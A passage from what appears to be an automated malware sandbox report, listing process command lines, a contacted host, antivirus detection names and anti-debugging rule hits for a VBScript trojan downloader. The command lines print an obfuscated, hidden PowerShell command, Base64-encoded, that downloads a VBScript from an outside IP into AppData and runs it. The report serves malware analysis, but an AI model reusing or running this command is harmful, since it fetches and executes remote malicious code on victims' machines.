QAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA3ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAOQA4ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANQAgAAkAIAAgACAACQAJAAkAIAAJACkAIAAJAAkAIAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAJAC0AbwB1AHQARgBpAGwAZQAgACAACQAJACAAIAAJACAACQAJAB0gJABFAG4AVgA6AEEAcABwAEQAYQB0AEEAXABIAFQATQBMAC4AdgBiAHMAHSAgACAACQAJACAACQAgACAACQAgACAACQAJACAACQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAdABBAFIAVAAgACAAIAAgACAAIAAgACAAHSAkAEUAbgB2ADoAQQBQAFAARABhAFQAYQBcAEgAVABNAEwALgB2AGIAcwAdIA== " |
cmdline | "C:\Windows\system32\cmd.exe" "/C powERsheLL.ExE -EX BypaSS -NOp -W HiDdEN -eC IAAJAAkACQAJAFsATgBlAHQALgBzAEUAUgBWAGkAYwBlAHAAbwBpAE4AVABNAGEAbgBhAEcARQBSAF0AOgA6AHMARQBjAFUAUgBJAHQAWQBwAHIATwB0AE8AYwBPAEwAIAAgACAAIAAgACAAIAA9ACAACQAgAAkACQAgAAkACQAgAAkAIAAgAFsAbgBlAFQALgBTAEUAQwBVAFIAaQBUAFkAcAByAE8AdABPAEMATwBsAHQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdwBHAGUAVAAgACAAIAAoAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAwADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADIAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQAOQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADYAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAyACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADUAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAMwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADAANQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADAAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMAAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAMQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcAMgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAOAA0ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA3ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAOQA4ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANQAgAAkAIAAgACAACQAJAAkAIAAJACkAIAAJAAkAIAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAJAC0AbwB1AHQARgBpAGwAZQAgACAACQAJACAAIAAJACAACQAJAB0gJABFAG4AVgA6AEEAcABwAEQAYQB0AEEAXABIAFQATQBMAC4AdgBiAHMAHSAgACAACQAJACAACQAgACAACQAgACAACQAJACAACQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAdABBAFIAVAAgACAAIAAgACAAIAAgACAAHSAkAEUAbgB2ADoAQQBQAFAARABhAFQAYQBcAEgAVABNAEwALgB2AGIAcwAdIA== " |
cmdline | powERsheLL.ExE -EX BypaSS -NOp -W HiDdEN -eC IAAJAAkACQAJAFsATgBlAHQALgBzAEUAUgBWAGkAYwBlAHAAbwBpAE4AVABNAGEAbgBhAEcARQBSAF0AOgA6AHMARQBjAFUAUgBJAHQAWQBwAHIATwB0AE8AYwBPAEwAIAAgACAAIAAgACAAIAA9ACAACQAgAAkACQAgAAkACQAgAAkAIAAgAFsAbgBlAFQALgBTAEUAQwBVAFIAaQBUAFkAcAByAE8AdABPAEMATwBsAHQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdwBHAGUAVAAgACAAIAAoAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAwADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADIAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQAOQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADYAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAyACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADUAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAMwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADAANQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADAAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMAAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAMQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcAMgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAOAA0ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA3ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAOQA4ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANQAgAAkAIAAgACAACQAJAAkAIAAJACkAIAAJAAkAIAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAJAC0AbwB1AHQARgBpAGwAZQAgACAACQAJACAAIAAJACAACQAJAB0gJABFAG4AVgA6AEEAcABwAEQAYQB0AEEAXABIAFQATQBMAC4AdgBiAHMAHSAgACAACQAJACAACQAgACAACQAgACAACQAJACAACQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAdABBAFIAVAAgACAAIAAgACAAIAAgACAAHSAkAEUAbgB2ADoAQQBQAFAARABhAFQAYQBcAEgAVABNAEwALgB2AGIAcwAdIA== " |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2412 CREDAT:145409 |
host | 117.18.232.200 |
Cyren | VBS/Downldr.HP!Camelot |
Symantec | ISB.Downloader!gen80 |
ESET-NOD32 | VBS/Obfuscated.AO |
Kaspersky | HEUR:Trojan.Script.Alien.gen |
Tencent | Script.Trojan.Alien.Rwhl |
Baidu | VBS.Trojan-Downloader.Agent.ul |
Microsoft | Trojan:Script/Wacatac.B!ml |
ZoneAlarm | HEUR:Trojan.Script.Alien.gen |
Detected | |
Ikarus | Win32.Outbreak |
Fortinet | VBS/Agent.BB79!tr.dldr |
parent_process | iexplore.exe | martian_process | C:\Windows\System32\cmd.exe "/C powERsheLL.ExE -EX BypaSS -NOp -W HiDdEN -eC IAAJAAkACQAJAFsATgBlAHQALgBzAEUAUgBWAGkAYwBlAHAAbwBpAE4AVABNAGEAbgBhAEcARQBSAF0AOgA6AHMARQBjAFUAUgBJAHQAWQBwAHIATwB0AE8AYwBPAEwAIAAgACAAIAAgACAAIAA9ACAACQAgAAkACQAgAAkACQAgAAkAIAAgAFsAbgBlAFQALgBTAEUAQwBVAFIAaQBUAFkAcAByAE8AdABPAEMATwBsAHQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdwBHAGUAVAAgACAAIAAoAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAwADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADIAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQAOQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADYAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAyACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADUAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAMwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADAANQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdA